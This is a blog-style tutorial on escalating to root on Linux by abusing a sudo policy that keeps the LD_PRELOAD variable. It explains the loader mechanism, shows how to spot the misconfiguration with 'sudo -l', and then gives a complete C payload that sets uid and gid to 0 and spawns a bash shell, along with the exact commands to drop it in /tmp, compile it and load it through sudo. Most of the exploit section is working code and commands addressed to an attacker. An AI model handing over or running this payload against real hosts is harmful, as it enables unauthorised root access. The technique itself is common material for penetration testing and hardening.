Privilege Escalation from an LD_PRELOAD environment variable. Before exploit let’s read something about LD_PRELOAD environment Variable.
Index
- What is LD_PRELOAD?
- Detection.
- Exploit LD_PRELOAD.
What is LD_PRELOAD?
LD_PRELOAD is an optional environmental variable containing one or more paths to shared libraries, or shared objects, that the loader will load before any other shared library including the C runtime library (libc.so) This is called preloading a library.
To avoid this mechanism being using as an attack vector for suid/sgid executable binaries, the loader ignores LD_PRELOAD if ruid != euid. For such binaries, only libraries in standard paths that are also suid/sgid will be preloaded.
For More click here.
Detection
Fire up terminal and type:
user@debian:~$ sudo -l Matching Defaults entries for user on this host: env_reset, env_keep+=LD_PRELOAD
If output something like this, congratulations target is vulnerable and you can exploit LD_PRELOAD issue to get root privilege shell and to acomplished privilege escalation you also need some sudo permission binary which use LD_PRELOAD envr.
some Sudo command which can be done current user .
Program File :
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init() {
unsetenv("LD_PRELOAD");
setgid(0);
setuid(0);
system("/bin/bash");
}
Exploit LD_PRELOAD.
open terminal and go to any Writable Directory for dropping shell.
writtable directory like
- /tmp
- /var/tmp
- /dev/shm
in our case we using /tmp directory.
Drop a evil.c using any text editor, here we used cat for droping shell.
user@debian:/tmp$ cat << EOF >> evil.c
> #include <stdio.h>
> #include <sys/types.h>
> #include <stdlib.h>
> void _init() {
> unsetenv("LD_PRELOAD");
> setgid(0);
> setuid(0);
> system("/bin/bash");
> }
> EOF
lest Compile and make object file.
gcc -fPIC -shared -o evil.so evil.c -nostartfiles
Time to final step 3:)
sudo LD_PRELOAD=evil.so <COMMAND>
here <COMMAND> mean which command have u allowed to do with sudo.
you can use any sudo command which allowed to current user.
BooOO00m You got Root SHELL..
Thanks For Reading Comment below your Feedback and suggestion.
[…] https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/https://pen-testing.sans.org/resources/papers/gcih/attack-defend-linux-privilege-escalation-techniques-2016-152744http://0x90909090.blogspot.com/2015/07/no-one-expect-command-execution.htmlhttps://touhidshaikh.com/?p=827https://github.com/sagishahar/lpeworkshop/blob/master/Lab%20Exercises%20Walkthrough%20-%20Linux.pdf […]
[…] https://touhidshaikh.com/2018/04/12/sudo-ld_preload-linux-privilege-escalation/ […]